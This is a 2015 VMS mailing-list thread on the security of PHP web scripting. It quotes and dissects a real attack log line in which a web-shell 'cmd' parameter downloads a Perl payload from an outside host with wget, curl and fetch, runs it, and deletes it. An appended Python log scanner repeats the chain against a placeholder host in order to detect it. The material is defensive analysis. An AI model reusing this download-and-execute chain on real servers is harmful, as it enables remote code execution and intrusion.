[Info-vax] Using VMS for a web server

Jan-Erik Soderholm jan-erik.soderholm at telia.com
Wed Jun 10 02:17:07 EDT 2015


Dirk Munk wrote on 2015-06-10 07:58:
> Jan-Erik Soderholm wrote:
>>> Bill Gunshannon wrote on 2015-06-09 16:49:
>>> In article <ml6qf1$d82$1 at news.albasani.net>,
>>>     Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>>
>>>>
>>>> It would be nice to have a reproducer and test it out.
>>>> Or at least a pointer to a description.
>>>>
>>> ....
>>>>
>>>> OK. I have only read quite a lot about PHP and its "problems"
>>>> but never used it or had it installed on any server.
>>>>
>>>> But it would surprise me *a lot* if there wasn't an available
>>>> fix for a simple URL based exploit...
>>>
>>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>>> so here is just one to look at.
>>>
>>> First, a log entry (sanitized a bit as I don't really need someone else
>>> trying this):
>>>
>>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>>
>>>
>>> Now, let's pull out the applicable part:
>>>
>>> "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
>>>
>>> Now we analyze it:
>>>
>>> "GET
>>> /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>>
>>> There is a request to get a PHP script.
>>>
>>> Note immediately after this part is "?cmd="        Hmmmmmm......
>>>
>>> And what is the command?
>>>
>>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>>>
>>> And if we break it down:
>>>
>>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>>
>>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>>
>>> fetch%20http://identerprise.co.kr/css/b.txt;
>>>
>>> perl%20qtalk.txt;
>>>
>>> rm%20-rf%20qtalk.txt*
>>>
>>>
>>> So, the attacker uses a hole in PHP to download a Perl script, using
>>> three common ways of doing it (I don't know if any of these are available
>>> on VMS but I suspect curl or wget might be).  He then runs it.  And when
>>> he is done he cleans up his tracks.
>>>
>>> What does it do?  No idea.  The point is to show something that PHP
>>> allows as a "feature" that makes it probably the worst possible web
>>> scripting language.
>>>
>>> I have seen this method used to download a telnet daemon written in
>>> either PHP or Perl.  This allows outsiders who do not have an account on
>>> a system to get in for a look around.  Good way to look for security
>>> shortcomings.
>>>
>>> bill
>>>
>>
>> OK. That needs a script called wawalo.php already being on the server
>> in a directory where the server can execute it. The exploit is really
>> to be able to upload the wawalo.php file in the first place.
>>
>> If you have a server setup where someone can both upload a random
>> file and then also execute that file just like that from the same
>> directory, you have a severe problem.
>>
>> Now, is this a "hole in PHP"? Or could the same thing be done
>> using any tool that can take an input parameter and execute it?
>>
>> I guess any scripting tool could be used to write such a script.
>> Many scripting languages are able to take a string and execute it.
>>
>> Can this be done on a WASD/VMS server? Not if you do not have
>> file upload enabled, at least. And you also need execute rights
>> on the upload directory.
>
> Is that true? After all, a script file is not an executable. It is 'just' a
> file to be read by the PHP runtime executable, and then PHP is doing the
> actual processing.

Yes, from a strict VMS perspective. But you also either must have
a global mapping rule in your web config that allows PHP files to
be run from anywhere, or a specific mapping rule allowing PHP files
to be run from the actual directory. If not, the web server will
not run the PHP file at all, will it?


>
> So the question is if script languages in a way undermine the VMS security
> setup.

Not generally. They run in the same process context. A scripting
language should not be allowed to do more than the process itself.



>
>> You can also set it up so that PHP
>> script can only be executed from a safe "script" directory
>> with no external write access.
>>
>> But again, is it really a "hole in PHP" ?? I'm not sure...
>>
>>
>> Jan-Erik.
>>
>
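Added example, not part of the thread: a small Python checker that does, over a batch of access-log lines, what Bill did by hand above. It URL-decodes a `cmd=`-style parameter, splits the `;`-chained commands, flags the download-then-run pattern, and uses the 404 to record whether the named script was even present on the server. The sample lines, IPs and hostnames are constructed placeholders, and the parameter-name and tool lists are assumptions.

```python
import re
from urllib.parse import unquote
# Apache-style "combined" access-log line: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
CMD_PARAMS = {"cmd", "c", "exec", "command"}            # assumed: usual web-shell parameter names
DOWNLOADERS = {"wget", "curl", "fetch"}                 # the three fetch tools in the quoted entry
INTERPRETERS = {"perl", "sh", "bash", "python", "php"}  # assumed: interpreters that run the payload

def parse_query(query):
    """Split a raw query string on '&' only, so ';' survives as the shell separator it is."""
    params = {}
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        params.setdefault(unquote(name), []).append(value)
    return params

def split_command(raw):
    """URL-decode a command parameter and break it into its ';'-chained commands."""
    return [c.strip() for c in unquote(raw).split(";") if c.strip()]

def analyse(line):
    """Return None if the line is not a combined-log entry, else a verdict dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    findings = []
    for name, values in parse_query(query).items():
        if name.lower() not in CMD_PARAMS:
            continue
        for value in values:
            cmds = split_command(value)
            words = {c.split()[0] for c in cmds}
            chain = bool(words & DOWNLOADERS) and bool(words & INTERPRETERS)
            findings.append({"param": name, "commands": cmds, "download_then_run": chain})
    # 404 means the named script was not on the server, so this attempt went nowhere.
    return {"ip": m.group("ip"), "path": path, "status": int(m.group("status")),
            "script_present": m.group("status") != "404", "findings": findings}

def scan(lines):
    """Keep only the entries that carry a command parameter."""
    return [r for r in map(analyse, lines) if r and r["findings"]]

# Constructed sample lines modelled on the entry quoted above; IPs and hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.9 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://payload.invalid/q.txt;curl%20-O%20http://payload.invalid/q.txt;fetch%20http://payload.invalid/b.txt;perl%20q.txt;rm%20-rf%20q.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Mar/2015:20:37:01 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

Running `scan(SAMPLE_LOG)` reports only the first line, with the five decoded commands and `script_present` false; a hit with `script_present` true is the case Jan-Erik describes, a writable directory the server will also execute from.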